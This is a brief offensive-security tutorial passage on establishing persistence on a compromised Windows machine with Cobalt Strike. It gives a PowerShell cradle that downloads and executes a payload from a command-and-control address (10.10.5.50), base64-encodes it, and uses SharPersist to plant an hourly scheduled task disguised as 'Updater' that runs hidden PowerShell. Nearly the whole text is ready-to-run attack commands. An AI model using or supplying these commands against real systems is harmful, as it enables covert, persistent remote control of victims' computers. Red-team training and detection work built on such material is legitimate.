In this section we will cover how to prisite in the victim computer.
First let’s create a beacon in Cobalt Strike.
Now let’s open the Scripted Web Delivery.
Now let’s copy the command and save it into powershell variable.
$str = 'IEX ((new-object net.webclient).downloadstring("<http://10.10.5.50:80/b>"))'
now let’s change it to base64 command.
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
now let’s use SharpPersist.exe to make a scheduled task on that machine running as the current user.
execute-assembly C:\\Tools\\SharPersist\\SharPersist\\bin\\Release\\SharPersist.exe -t schtask -c "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4ANQAwADoAOAAwAC8AYgAiACkAKQA=" -n "Updater" -m add -o hourly
as we see we created a sceduled task!